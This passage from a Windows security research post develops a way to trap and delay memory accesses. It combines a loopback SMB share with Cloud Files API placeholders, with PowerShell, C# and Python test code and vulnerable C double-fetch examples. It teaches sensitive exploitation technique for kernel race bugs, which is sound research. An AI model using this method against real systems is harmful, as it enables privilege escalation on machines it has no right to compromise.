Overview diagram of page fault causing access to the file system. A user application is shown reading memory from a file mapped into memory. When the memory read occurs a page fault is generated in the kernel. As the memory is part of a file mapping this calls into the IO Manager which then requests the file data from the file system. The read data is then returned back through the kernel to satisfy the page fault and the user application can complete the memory read.

The end result is it can take a significant amount of time, relative to a CPU’s native speed that is, to handle a page-fault. However, abusing these virtual memory behaviors only widens the TOCTOU window; it doesn’t allow for precise timing when swapping values in memory. As a result the exploitation techniques still come with limitations. For example, exploitation is very slow, if not impossible in some cases, on a machine with a single CPU core, as it relies on having concurrent threads reading and writing.

An ideal exploit primitive would be one where the exploitation window can be made arbitrarily large so that it becomes trivial to win the race. Taking previous experience and knowledge of existing bug classes my ideal primitive would be one which meets a set of criteria:

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

While meeting all these criteria would be ideal, there’s no guarantee we’ll meet all or any of them. If we only meet some then the range of exploitable vulnerabilities might be limited. Let’s start with a quick overview of the existing work which might give us an idea of how to proceed to find a primitive.

Existing Work

Having spoken to Mateusz and made an effort to look for any subsequent work, there seems to be little novel work over and above the original Bochspwn paper on the exploitation of these types of TOCTOU issues. At least this is true for exploitation on Windows; novel techniques have been developed on other platforms, specifically Linux. I’ll cover two of them, both of which rely on the behavior of virtual memory I previously described.

The first technique in Linux makes use of Userfault File Descriptor (userfaultfd) to get notifications when page-faults occur in a process. With userfaultfd enabled a secondary thread in the process can read a notification and handle the page-fault in user mode. Handling the fault could be mapping memory at the appropriate location or changing page protection. The key is the faulting thread is suspended until the page-fault is handled by another thread. Therefore if a kernel function accesses the memory, the access will be trapped until the fault is handled. This allows for a primitive where the memory access can be delayed indefinitely as well as having a timing signal for the access. Using userfaultfd also allows read faults to be distinguished from write faults, as the memory page can be write-protected.

Using userfaultfd works for in-process access such as from the kernel, but is not really useful if the code accessing the memory is in another process. To solve that problem you can use the FUSE file system as Jann Horn demonstrated in a previous Project Zero blog post. A FUSE file system is implemented entirely in user mode, but any requests for the file go through the Linux kernel’s Virtual File System APIs. As a file is accessed as if it was implemented by an in-kernel file system it’s possible to map that file into memory using mmap. When a page-fault occurs on a FUSE backed memory region a request will be made to the user-mode file system daemon which can delay the read or write request indefinitely.

Remote File Systems

As far as I can tell there’s nothing equivalent to Linux’s userfaultfd on Windows. One feature which caught my eye was memory write watches. But those seem to just allow an application to query whether memory has been written to since the last time it was checked; they don’t allow memory writes to be trapped.

If we can’t just trap page-faults to virtual memory what about mapping a file on a user-mode filesystem like FUSE? Unfortunately there is no built-in FUSE driver in Windows 10 (yet?), but that doesn’t mean there’s no mechanism to implement a file system in user-mode. There are some efforts to make a real FUSE on Windows, such as the WinFsp project, but I’d expect the chances of them being installed on a real system to be vanishingly small.

The first thought I had was to try to exploit Multiple UNC Provider (MUP) clients. When you access a file via a UNC path, e.g. \\server\share\file.bin, this will be handled by a MUP driver in the kernel, which will pass it to one of the registered client drivers. As far as the kernel is concerned the opened file is a regular file (with some caveats) which generally means the file can be mapped into memory. However, any requests for the contents of that file will not be handled directly, but instead handled by a server over a network protocol.

Ideally we should be able to implement our own server and handle the read or write requests to a file mapping, which would allow us to detect or delay the request so that we can exploit any TOCTOU. The following table lists only the Microsoft MUP drivers that I identified, which versions of Windows 10 each driver is supported on, and whether it’s enabled by default.

Remote File System    | Supported Version | Default?
SMB                   | Everything        | Yes (SMBv1 might be disabled)
WebDAV                | Everything        | Yes (except Server SKUs)
NFS                   | Everything        | No
P9                    | Windows 10 1903   | No (needs WSL)
Remote Desktop Client | Everything        | Yes

While MUP was designed for remote file systems there’s no requirement that the file system server is actually remote. SMB, WebDAV and NFS are IP based protocols and can be redirected to localhost. P9 uses a local Unix Socket which can’t be remoted anyway. The terminal services client sends file access requests back to the client system over the RDP protocol. For all these protocols we can implement the server with varying degrees of effort and see if we can detect and delay reads and writes to the file mapping.

I decided to focus only on two, SMB and WebDAV. These are the only two which are enabled by default and trivially usable. While the Remote Desktop Client is in theory installed by default, the RDP server is not normally enabled by default. Setting up the RDP session is also complex and might require valid authentication credentials, so I decided against it.

Server Message Block

SMB is almost as old as Windows itself, having been introduced in Lan Manager 1.0 back in 1987. The latest SMB version 3.1 protocol only bears a passing resemblance to that original version having shed its NetBIOS roots for a TCP/IP connection. Its lineage does mean it’s the best integrated of any of the network file systems, with the MUP APIs being designed around the needs of SMB.

I decided to do a simple test of the behavior of mapping a file over SMB. This is fairly easy as you can access SMB on the same machine via localhost. I first created a 1GiB file on a local disk, the rationale being if SMB supports caching file data it’s unlikely to read something that large in one go. I then started Wireshark and monitored the loopback interface to capture the SMB traffic as shown below.

Overview diagram of SMB test with wireshark in place to inspect the network traffic from the SMB client to the SMB server. The diagram starts overview with a user application reading memory of a mapped file which causes a page fault. As the file is on an SMB share this calls into the SMB client which sends a request to the SMB server and from there to the file system. In between the SMB client and SMB server components the Wireshark logo indicates where we are monitoring the network traffic.

I then wrote a quick PowerShell script which maps the file into memory and then reads a few bytes from memory at a few different offsets.

Use-NtObject($f = Get-NtFile "\\localhost\c$\root\file.bin" -Win32Path) {
    Use-NtObject($s = New-NtSection -File $f -Protection ReadWrite) {
        Use-NtObject($m = Add-NtSection -Section $s -Protection ReadWrite) {
            $m.ReadBytes(0, 4)
            $m.ReadBytes(256*1024*1024, 4)
            $m.ReadBytes(512*1024*1024, 4)
            $m.ReadBytes(768*1024*1024, 4)
        }
    }
}

This just reads 4 bytes from offsets 0, 256MiB, 512MiB and 768MiB. Going back to Wireshark I filtered the output to only SMBv2 read requests using the display filter smb2.cmd == 8, and the following four packets can be observed.

Read Request Len:32768 Off:0 File: root\file.bin
Read Request Len:32768 Off:268435456 File: root\file.bin
Read Request Len:32768 Off:536870912 File: root\file.bin
Read Request Len:32768 Off:805306368 File: root\file.bin

This corresponds with the exact memory offsets we accessed in the script, although the length is always 32KiB, not the 4 bytes we requested. Note that it’s not the typical Windows memory allocation granularity of 64KiB which you might expect. In my testing I’ve never seen anything other than 32KiB requested.

All the bytes we’ve tested are aligned to a 32KiB block. What if the bytes were not aligned, for example if we accessed 4 bytes from address 512MiB minus 2? Changing the script to add the following allows us to check the behavior:

$m.ReadBytes(512*1024*1024 - 2, 4)

In Wireshark we see the following read requests.

Read Request Len:32768 Off:536838144 File: root\file.bin
Read Request Len:32768 Off:536870912 File: root\file.bin

The accesses are still at 32KiB boundaries, however as the request straddles two blocks the kernel has fetched the preceding 32KiB of data from the file and then the following 32KiB. You might think that all makes sense, however this behavior turned out to be a fluke of testing.

Overview diagram of memory read layout. In the middle is a set of boxes representing the native 4KiB pages being read. All the boxes are contained within a single larger region which is the large page size. Above the boxes are arrows which show that from the base of the 4KiB box a 32KiB read will be made into the file which can satisfy the reads from other 4KiB pages. The final box shows that the last 32KiB of the large page size will always be read as a single page regardless of where in the box the read occurs.

The diagram above shows the structure of how mapped file reads are handled. When an address is read the kernel will request 32KiB from the closest 4KiB page boundary, not the 32KiB boundary. However, there’s then a secondary structure on top based on the supported size of large pages. If the read is anywhere within 32KiB of the end of a large page the read offset is always for the last 32KiB.

For example, on my system the large page size (as queried using the GetLargePageMinimum API) is 2MiB. Therefore, starting at offset 512MiB, for any access between 512MiB and 514MiB - 32KiB the kernel will read 32KiB from the offset truncated to the closest 4KiB boundary. For any access between 514MiB - 32KiB and 514MiB the read will always request offset 514MiB - 32KiB so that the 32KiB read doesn’t cross the large page boundary.
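The offset rule described above can be sketched as a small Python model. This is only a model of the observed behavior, not the memory manager's actual logic; the function name smb_read_offset and the constants are hypothetical, and the 2MiB large page size is simply the value reported on the test system.

```python
KIB = 1024
MIB = 1024 * KIB

NATIVE_PAGE = 4 * KIB   # native page size
READ_SIZE = 32 * KIB    # size of every SMB read observed in testing
LARGE_PAGE = 2 * MIB    # assumption: GetLargePageMinimum() result on the test system


def smb_read_offset(access_offset, large_page=LARGE_PAGE):
    """Predict the file offset of the SMB read triggered by a faulting access."""
    # Truncate the faulting offset to the start of its native page.
    page_start = access_offset - (access_offset % NATIVE_PAGE)
    # Last offset from which a 32KiB read still fits inside this large page.
    large_page_start = access_offset - (access_offset % large_page)
    last_read_start = large_page_start + large_page - READ_SIZE
    # Accesses in the final 32KiB of a large page are clamped to that offset.
    return min(page_start, last_read_start)


for offset in (0, 256 * MIB, 512 * MIB - 2, 512 * MIB, 768 * MIB):
    print(offset, "->", smb_read_offset(offset))
```

The model reproduces the offsets seen in the Wireshark captures above, including the 536838144 read for the access at 512MiB minus 2, which falls in the last 32KiB of the preceding large page.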

This allows reads at 4KiB boundaries, however the amount of data read is still 32KiB. This means that once one 4KiB page is accessed the kernel will populate the current page and 7 following pages. Is there any way to only populate a single native page? Based on a comment from Mateusz I tested returning short reads. If the SMB server returns fewer bytes than requested from the read then rather than failing it only populates the pages covered by the read. By returning these short reads we can get trap granularity down to the native page size except for the final 32KiB of a large page. If a read request is shorter than the native page size the rest of the page is zeroed.
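To make the short read arithmetic concrete, here is a minimal Python sketch of how many native pages a given server response would populate. The helper name pages_populated is hypothetical. Zero-filling the tail of the last page for any response length is an assumption that generalizes the sub-page case described above, and a zero-length response is rejected because that case was not covered by the testing.

```python
NATIVE_PAGE = 4 * 1024   # native page size
READ_SIZE = 32 * 1024    # size of the read the client asks for


def pages_populated(bytes_returned, page_size=NATIVE_PAGE):
    """Return (pages populated, bytes zero-filled) for one server response."""
    if not 0 < bytes_returned <= READ_SIZE:
        raise ValueError("response length must be between 1 and 32KiB")
    # Ceiling division: a partially covered page still gets populated.
    pages = -(-bytes_returned // page_size)
    # Assumption: the uncovered tail of the last page is zeroed.
    zero_filled = pages * page_size - bytes_returned
    return pages, zero_filled


print(pages_populated(32 * 1024))  # full read, all 8 pages populated
print(pages_populated(4096))       # short read, a single page populated
print(pages_populated(100))        # sub-page read, rest of the page zeroed
```

Returning exactly 4096 bytes is the interesting case for trapping, as it leaves the seven following pages unresolved so that each of them can fault separately.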

What about writing? Let’s change the script again to call WriteBytes rather than ReadBytes, for example:

$m.WriteBytes(256*1024*1024, @(0xAA, 0xBB, 0xCC, 0xDD))

You will see a write request to the file in Wireshark, similar to the following:

Write Request Len:4096 Off:268435456 File: root\file.bin

However, if you dig a bit deeper you’ll notice that the write only happens once the file is closed, not in response to the WriteBytes call. This makes sense, as there isn’t any easy way to detect when the write happened in order to force the page to be flushed back to the file system. Even if there was a way, flushing to a network server for every write would have a massive performance impact.

All is not lost, however: before the memory is safe to write it must be populated with the contents from the file. Therefore if you look before the write you’ll see a corresponding read request, synchronous with the write access, for the 32KiB region which encompasses the write location. You can detect a write through its corresponding read, but you can’t distinguish a read from a write at the protocol level.
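The request pattern the server sees can be summarized with a toy Python model. Everything here (the MappedFileModel class and its methods) is hypothetical and only mirrors the behavior observed above: the first access to an unresolved region produces a read, whether that access was a load or a store, and dirty pages are only written back on close. For simplicity the model aligns reads to 32KiB blocks and ignores the finer offset rules.

```python
BLOCK = 32 * 1024   # read size seen on the wire
PAGE = 4 * 1024     # write size seen on the wire


class MappedFileModel:
    """Toy model of the SMB requests generated by accesses to a mapped file."""

    def __init__(self):
        self.resident = set()   # blocks already fetched from the server
        self.dirty = set()      # pages modified locally but not yet flushed
        self.requests = []      # (kind, offset) tuples as seen by the server

    def _fault_in(self, offset):
        block = offset - offset % BLOCK
        if block not in self.resident:
            self.resident.add(block)
            self.requests.append(("read", block))

    def read(self, offset):
        self._fault_in(offset)

    def write(self, offset):
        # A store must first populate the page, so the server sees a read.
        self._fault_in(offset)
        self.dirty.add(offset - offset % PAGE)

    def close(self):
        # Dirty pages are only flushed once the file is closed.
        for page in sorted(self.dirty):
            self.requests.append(("write", page))
        self.dirty.clear()


m = MappedFileModel()
m.write(256 * 1024 * 1024)
print(m.requests)   # the store shows up as a read request
m.close()
print(m.requests)   # the write request only appears after close
```

From the server's point of view a load and a store to an unresolved block are indistinguishable, which is why the primitive can signal that memory was touched but not how.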

All this testing indicates that if we have control over the server we can detect memory access to the mapped file. Can we delay the access as well? I wrote a simple SMB server in .NET 5 using the SMBLibrary by Tal Aloni. I implemented the server with a custom filesystem handler and added some code to the read path which delays for 10 seconds when the file offset is at or above 512MiB.

if (Position >= (512 * 1024 * 1024)) {
    Console.WriteLine("====> Delaying at Position {0:X}", Position);
    Thread.Sleep(10000);
    Console.WriteLine("====> Continuing.");
}

The data returned by the read operation can be arbitrary, you just need to fill in the appropriate byte buffers in the read. To test the access times I wrapped the memory read requests inside a Measure-Command call to time the memory access.

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }
Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }
Measure-Command { $m.ReadBytes(512*1024*1024, 4) }
Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

To compare the access time a read request is made to a location 4 bytes below the 512MiB boundary and then at the 512MiB boundary. By making two requests we should be able to see if the results differ per-read. The results were as follows:

# Below 512MiB (Request 1)
Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 1
Milliseconds      : 25
...

# Below 512MiB (Request 2)
Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 0
Milliseconds      : 1
...

# Above 512MiB (Request 1)
Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 10
Milliseconds      : 358
...

# Above 512MiB (Request 2)
Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 0
Milliseconds      : 1
...

The first access below 512MiB takes around a second. This is because the request still needs to be made to the server, and the server is written in .NET, which can have a slow startup time for running new code. The second request takes significantly less than 1 second: the memory is now cached locally, so no request needs to be made.

For the accesses above 512MiB the first request takes around 10 seconds, which correlates with the added delay. The second request takes less than a second because the page is now cached locally. This is exactly what we’d expect, and proves that we can at least delay for 10 seconds. In fact you can delay the request at least 60 seconds before the connection is forcibly reset. This is based on the session timeout for the SMB client. You can query the SMB client timeout using the following command in PowerShell:

PS> (Get-SmbClientConfiguration).SessionTimeout

60

A few things to note about the SMB client’s behavior which came out of testing. First, the client or the Windows cache manager seems to be able to do some caching of the remote file. If you request a specific access when opening the file, such as GENERIC_READ | GENERIC_WRITE for the desired access, then caching is enabled. This means the read requests do not go to the server if they’ve previously been cached locally. However, if you specify MAXIMUM_ALLOWED for the desired access the caching doesn’t seem to take place. Secondly, sometimes parts of the file will be pre-cached, such as the first and last 32KiB of the file. I’ve not worked out the cause. Oddly it seems to happen more often with native code than .NET code, so perhaps it’s Windows Defender peeking at memory or perhaps Superfetch. In general as long as you keep your memory accesses somewhere in the middle of a large file you should be safe.

If you’ve run the example code you might notice a problem, running the example server locally fails with the following error:

System.Net.Sockets.SocketException (10013): An attempt was made to access a socket in a way forbidden by its access permissions.

By default Windows 10 has the SMB server enabled. This takes over the TCP ports and makes them exclusive so it’s not possible to bind to them from a normal user. It is possible to disable the local SMB server, but that would require administrator privileges. Still, it was worth verifying whether the SMB server approach will work even if we have to communicate with a remote server.

I did do some investigation into tricks I could use to get the built-in SMB server to work for our purposes. For example I tried to use the fact that you can set an Opportunistic Lock which will trap file reads. I used this trick to exploit a TOCTOU vulnerability in the LUAFV driver. Unfortunately the SMB server detects the file is already in a lock and waits for the OpLock break to occur before allowing access to the file. This made it a non-starter.

For testing you can disable the LanmanServer service and its corresponding drivers. If you wanted to use this on an arbitrary system you'd almost certainly need to connect to a remote server. I’ve released the example server code here, which can be repurposed, although it is only a demonstrator. It allows for read granularity of the native page size, which is assumed to be 4KiB. The server code should work on Linux but as of version 1.4.3 of SMBLibrary on NuGet there’s a bug which causes the server to fail when starting. There is a fix in the GitHub repository but at the time of writing there’s no updated package.

How well does abusing the SMB client meet with our criteria from earlier? I’ve crossed out all the ones we’ve met.

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

Using the SMB client does meet the majority of our criteria. I verified that the access will still trap regardless of whether kernel or user mode code accesses the memory. The biggest problem is that it’s hard to use this from a sandboxed application, where it would perhaps be most useful. This is because MUP restricts access to remote file systems by default from restricted and low IL processes, and AppContainer sandboxes need specific capabilities which are unlikely to be granted to the majority of applications. That’s not to say it’s completely impossible but it’d be hard to do.

While our trick doesn’t really delay the memory read indefinitely, for our purposes the limit of 60 seconds based on the SMB session timeout is going to be enough for most vulnerabilities. Also once the trap has been activated you can’t force the memory manager to request the same page from the server. I tried playing with memory caching flags and direct IO but at least for files over SMB nothing seemed to work. However, you can specify your own base address when mapping a file so you could map different offsets in the file to the same virtual address by unmapping the original and mapping in a new copy. This would allow you to use the same address multiple times.

WebDAV

As SMB can’t be easily used locally, what about WebDAV? By default TCP port 80 is unused on Windows 10 so we can start our own web server to communicate with. Also unlike on Linux there’s no requirement for having administrator privileges to bind to TCP ports under 1024. Even if either of these were not the case the WebDAV client supports a syntax to specify the TCP port of the server. For example if you use the path \\localhost@8080\share then the WebDAV HTTP connection will be made over port 8080.
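As a small illustration of the port syntax, the following Python helper builds the UNC path the WebDAV client would be given. The function name webdav_unc_path is hypothetical, and it only covers the host@port form shown above.

```python
def webdav_unc_path(host, share, port=None):
    """Build a UNC path for the WebDAV client, optionally with a custom TCP port."""
    # The port is appended to the host name after an '@' character.
    server = host if port is None else f"{host}@{port}"
    return f"\\\\{server}\\{share}"


print(webdav_unc_path("localhost", "share", 8080))
```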

However, does the WebDAV client expose the right read and write primitives to allow us to trap on memory access? I wrote a simple WebDAV server using the NWebDav library to serve local files. Running the script but specifying the WebDAV server on port 8080 to open the 1GiB file I’m immediately faced with a problem:

Get-NtFile : (0xC0000904) - The file size exceeds the limit allowed and cannot be saved.

Just opening the file fails with the error code STATUS_FILE_TOO_LARGE. The reason for that can be found in one of many Microsoft Knowledge Base articles such as this one. There’s a default limit of 50MB (that’s decimal megabytes) for any file accessed on a WebDAV share because it used to be possible to cause a denial of service by tricking a Windows system into downloading an arbitrarily large file.

The reason this size limit exists is also the reason WebDAV isn’t suitable for this attack. If you resize the file to below 50MB you’ll find the WebDAV client pulls the file in its entirety to the local disk before returning from the file open call. That file is then mapped into memory as a local file. The WebDAV server never receives a GET or PUT request synchronously with reads or writes to the memory mapping, so there’s no mechanism to detect or trap specific memory requests.
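The distinction between decimal and binary megabytes matters when picking a test file size, as this short Python sketch shows. The constant and function names are hypothetical, and treating a file of exactly 50,000,000 bytes as allowed is an assumption, since the boundary case wasn't tested.

```python
WEBDAV_DEFAULT_LIMIT = 50 * 1000 * 1000   # 50MB in decimal megabytes


def exceeds_webdav_limit(file_size, limit=WEBDAV_DEFAULT_LIMIT):
    """Return True if opening a file of this size would hit the default limit."""
    # Assumption: the limit is inclusive, so only larger files are rejected.
    return file_size > limit


print(exceeds_webdav_limit(1024 * 1024 * 1024))   # the 1GiB test file
print(exceeds_webdav_limit(50 * 1024 * 1024))     # 50MiB is also over the limit
print(exceeds_webdav_limit(32 * 1024 * 1024))     # 32MiB fits
```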

File System Overlay APIs

Abusing the SMB client does work, but it can’t be used locally on a default installation. I decided I needed to look for another approach. As I was looking at Windows Filter Drivers (see last blog post) I noticed a few of the drivers provided a mechanism to overlay another file system on top of an existing one. I trawled through MSDN to find the API documentation to see if anything would be suitable. The three I looked at are shown in the table below.

File system           | Supported Version | Default?
Projected File System | Windows 10 1809   | No
Windows Overlay (WOF) | Everything        | Yes
Cloud Files API       | Windows 10 1709   | Yes (except non-Desktop Server SKUs)

By far the most interesting one is the Projected File System. This was developed by Microsoft to provide a virtual file system for Git. It allows placeholder files to be “projected” into a directory on disk and the contents of those files are only “rehydrated” to a full file on demand. In theory this sounds ideal: as long as it populates the file’s contents piecemeal, we could add delays when receiving the PRJ_GET_FILE_DATA_CB callback.

However a basic implementation based on Microsoft’s ProjectedFileSystem sample code would always rehydrate the entire file during file open, similar to WebDAV. Perhaps there’s an option I missed to stream the contents rather than populate it in one go but I couldn’t find it immediately. In any case the Projected File System is not installed by default making it less useful.

WOF doesn’t really allow you to implement your own file system semantics. Instead it allows you to overlay files from either a secondary Windows Image File (WIM) or compressed files on the same volume. This really doesn’t give us the control we’re looking for. You might be able to finagle something to work but it seems like a lot of effort.

That leaves us with the Cloud Files API. This is used by OneDrive to provide the local online filesystem but is documented and can be used to implement any file system overlay you like. It works very similarly to the Projected File System, with placeholders for files and the concept of hydrating the file on demand. The contents of the files do not need to come from any online service such as OneDrive; they can all be sourced locally. Crucially, basic testing showed that it supports streaming the contents of the file based on what is being read, and that you can delay the file data requests so that the reading thread blocks until the read has been satisfied. This can be enabled by specifying the CF_HYDRATION_POLICY_PRIMARY hydration policy with the value CF_HYDRATION_POLICY_PARTIAL when configuring the base sync root. This allows the Cloud Files API to hydrate only the parts of the file which were accessed.

This seemed perfect, until I tested with the PowerShell file mapping script and found it didn’t work: my cloud file provider would always be asked to provide the entire file. Checking the Cloud Filter driver, when a request is received for mapping a placeholder file, the IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION handler always fully rehydrates the file before completing. If the file is not hydrated fully then the call to NtCreateSection never returns, which prevents the file being mapped into memory.

I was going to go back to doing my filter research until I realized I might be able to combine the SMB client loopback with the Cloud Files API. I already knew that the SMB client doesn’t really map a file, even locally; instead it reads it on-demand via the SMB protocol. And I also knew that the Cloud Files API would allow streaming of parts of the file on-demand as long as the file wasn’t being mapped into memory. The final setup is shown in the following diagram:

Overview of the operation of the exploitation trick. Memory is read by the application from a mapped file, which causes a page fault. That then requests the contents of the file to be pulled over SMB which goes to the local Cloud Filter Driver and back to the original application where the read is handled.

To use the primitive we first set up our own cloud provider by registering the sync root directory using the CfRegisterSyncRoot API, configuring it with the partial hydration policy. Then a 1GiB placeholder can be created in the directory using CfCreatePlaceholders. At this point the file does not have any contents on disk. If we now open and map the placeholder file via the SMB loopback client the file will not be rehydrated immediately.

Any memory access into the mapping will cause the SMB client to make a request for a 32KiB block, which will be passed to our user-mode cloud provider, which we can detect and delay as necessary. It goes without saying that the contents of the file can also be arbitrary. Based on testing it doesn’t seem like you can force the read granularity down to the native page size like when implementing a custom SMB server, however you can still make requests at native page size boundaries within the large page size constraint. It might be possible to modify the file size to trick the SMB server into doing short reads but this behavior has not been tested. A sample implementation of the cloud provider is available here.

Usage Examples

We now have an exploitation trick which allows us to trap and delay virtual memory reads and writes. The big question is, does this improve the exploitation of vulnerabilities such as double fetches? The answer depends on the actual vulnerability. A quick note: when I use the word page I mean the unit of memory which will cause a request to the SMB server, e.g. 32KiB, not the native page size such as 4KiB.

Let’s take the example given at the start of this blog post. This vulnerability reads the value from the same memory address, lpInputPtr, twice: first for the comparison, then for the size to copy. The problem for exploitation is that the memory trap is one shot, which is one of the limitations of the technique. When the trap fires on the read of the size for the comparison you can delay it indefinitely. However, once you provide the requested memory page and the faulting thread is resumed, the trap won’t fire on the second read; the value will just be read from memory as if it was always there.

You might wonder if you could remap the memory page when you detect the first read? Unfortunately this doesn’t work. When the thread is resumed it restarts at the faulting instruction and will perform the read again, therefore what would happen is the following:

Directed graph showing states of the double fetch. ① Read Size from Pointer -> ② Page Fault -> ③ Remap Page -> ④ Resume Thread -> Back to ①

As you can tell from the diagram you end up trapped in an infinite loop, as you remap a fresh page which just triggers another page fault ad infinitum. If you don’t perform step ③ then the operation will complete and there is a time window between resuming the thread, reading the now valid memory for the size comparison and the second read. However, in this example the time window is likely to be on the order of a couple of instructions, so using our exploitation trick isn’t better than the existing probabilistic approaches. That said, one advantage is you do know when the read occurs, which allows you to target the brute force window more accurately.
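The loop can be made explicit with a tiny Python model of the four states in the diagram. The function name and the max_faults cut-off are hypothetical and exist only so the model terminates; in the real system the thread would keep faulting for as long as the page keeps being remapped.

```python
def faults_until_read_completes(remap_on_fault, max_faults=5):
    """Count page faults taken by one read of a trapped page.

    Returns the number of faults, or None if the read has still not
    completed after max_faults faults.
    """
    faults = 0
    page_present = False
    while not page_present:            # (1) the read is attempted
        if faults == max_faults:
            return None                # give up: the read never completes
        faults += 1                    # (2) page fault
        # The handler supplies the page, but (3) remapping replaces it with
        # a fresh unresolved page before (4) the thread is resumed.
        page_present = not remap_on_fault
    return faults


print(faults_until_read_completes(remap_on_fault=False))
print(faults_until_read_completes(remap_on_fault=True))
```

Without the remap the read completes after a single fault, which is exactly the one shot behavior of the trap. With the remap the read never gets past step ①.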

This example is the worst case. What if there was more time between the reads? Another example from the Bochspwn paper is shown below:

PDWORD BufferSize = // controlled user-mode address
PUCHAR BufferPtr  = // controlled user-mode address
PUCHAR LocalBuffer;

LocalBuffer = ExAllocatePool(PagedPool, *BufferSize); ①
if (LocalBuffer != NULL) {
  RtlCopyMemory(LocalBuffer, BufferPtr, *BufferSize); ②
} else {
  // bail out
}

The same double fetch behavior is present; what’s different is that the value is passed to another function, in this case ExAllocatePool, which allocates kernel memory. Depending on the current memory configuration or how large the requested allocation is, there might be a significant time delay between ① and ②. Is there any way we can win the race?

Well not that I know of, at least not deterministically. But we can exploit one behavior to try to synchronize the reading and writing threads a little. Recall that in order to write to an unresolved page the contents of the page must first be read from the server. Therefore, to maintain consistency, any thread that writes to the unresolved page must generate a page fault and wait on the same lock as another thread which is just reading from the page, as shown in the following diagram:

Diagram showing separate read and write threads accessing the same pointer, one for read and one for write. When the page fault occurs both threads enter the same lock and they are both resumed once the lock is released.

By synchronizing the reading and writing threads you’re giving yourself a reasonable chance of causing a write to happen during the time window for exploitation. This is still a probabilistic approach, it depends on the scheduler. For example, it’s possible that the write thread is woken before the read thread which will cause the pointer to always take the final value. Or the read thread could run to completion before the write thread is ever scheduled to run making the value never change. It’s possible there’s some scheduler magic such as using multiple reader or writer threads or by selecting appropriate priorities which you could exploit to guarantee read and write ordering. I’d be surprised if something is reliable across multiple Windows 10 systems. I’d be very interested in anyone who’s got better ideas on how to improve the reliability of this.
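The three possible outcomes can be enumerated with a short Python model. It assumes a single write and reduces scheduling to the question of where that write lands relative to the two fetches; the names SAFE, EVIL, run_schedule and classify are all hypothetical.

```python
SAFE, EVIL = 16, 4096   # hypothetical small and oversized size values


def run_schedule(write_position):
    """Return the values seen by the two fetches for one scheduling order.

    write_position: 0 = write lands before the first fetch,
                    1 = between the fetches, 2 = after the second fetch.
    """
    value = SAFE
    fetches = []
    for step in range(3):
        if step == write_position:
            value = EVIL            # the writer thread runs here
        if step < 2:
            fetches.append(value)   # the reader performs a fetch
    return tuple(fetches)


def classify(fetches):
    first, second = fetches
    if first == SAFE and second == EVIL:
        return "race won"
    if first == EVIL:
        return "writer ran first, both fetches see the final value"
    return "reader finished first, value never changed"


for position in range(3):
    print(position, run_schedule(position), classify(run_schedule(position)))
```

Only one of the three orderings wins the race, and which one occurs is up to the scheduler. Releasing both threads from the same lock narrows when the write can land, but it doesn't choose the ordering.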

One approach you might be wondering about is unaligned access, say splitting the value across two separate pages. From a microarchitecture perspective it’s likely that the read will be split up into two parts, first touching one page then another. However, remember how the page fault works: it generates an exception which causes a handler to execute in the kernel. At this point any work the instruction has already done will have been discarded while the kernel deals with the page fault. When the thread is resumed it will restart the faulting instruction, which will reissue the appropriate micro operations to read from the unaligned address. Unless the compiler generated two loads for the unaligned access (which might happen on some architectures), there is no way I know of to restart the memory access instruction part of the way through.

This all seems slightly downbeat on the usefulness of the exploitation trick. Thing is, there’s as many different types of vulnerability as there are fish in the sea (if you’re reading this in 2100, I apologize for the acidification of the seas which killed all marine life, choose your own apocalypse-appropriate proverb instead). For example if we modify the original example as follows:

PDWORD lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];

 

if (lpInputPtr[0] > sizeof(LocalBuffer) || lpInputPtr[1] == 2) {

  return STATUS_INVALID_PARAMETER;

}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);

The check now ensures the size does not exceed the local buffer and that the second DWORD in the buffer is not set to 2. The second field might represent the buffer type, and type 2 isn’t valid for this request. If you check the compiler output for this code, such as on Godbolt, the difference in native code is 2 or 3 instructions. This would seem to not materially improve the odds of winning the TOCTOU race when using a naïve probabilistic approach. But with our exploitation trick we can now build a deterministic exploit.

Diagram showing access memory for the two reads which can generate a page fault which can allow us to modify the original size value. The central part of the diagram shows a previous page which only contains the Size field and the next page which contains the Type field and the rest of the structure.

The diagram above shows how we can achieve this deterministic exploit. We can place the Size field on a different page to the rest of the input buffer, although the buffer is still contiguous in virtual memory. The first page (N-1) should already be faulted into memory and contain the Size field which is smaller than the LocalBuffer size. We can let the read for the size ① complete normally.
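The layout described above comes down to simple offset arithmetic. The following is a minimal sketch, assuming a 4KiB page size and a structure that starts with two little-endian DWORDs (Size, then Type); the helper names are hypothetical and it only builds the bytes, it doesn't map them from a trapped file.

```python
import struct

PAGE_SIZE = 4096  # assumed page size


def build_split_buffer(size_value: int, type_value: int, payload: bytes, page_n: int = 1):
    """Return (buffer, base) where Size is the last DWORD of page N-1 and Type starts page N."""
    base = page_n * PAGE_SIZE - 4              # Size occupies the final 4 bytes of page N-1
    buf = bytearray((page_n + 1) * PAGE_SIZE)  # pages 0..N, contiguous like the virtual mapping
    if base + 8 + len(payload) > len(buf):
        raise ValueError("payload does not fit in page N")
    struct.pack_into("<II", buf, base, size_value, type_value)
    buf[base + 8:base + 8 + len(payload)] = payload
    return buf, base


def page_of(offset: int) -> int:
    """Index of the page containing the given byte offset."""
    return offset // PAGE_SIZE
```

With the default `page_n=1`, the Size field sits at offsets 4092 to 4095 (page 0) and the Type field starts at offset 4096 (page 1), so only the Type read touches the page that would be left unresolved.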

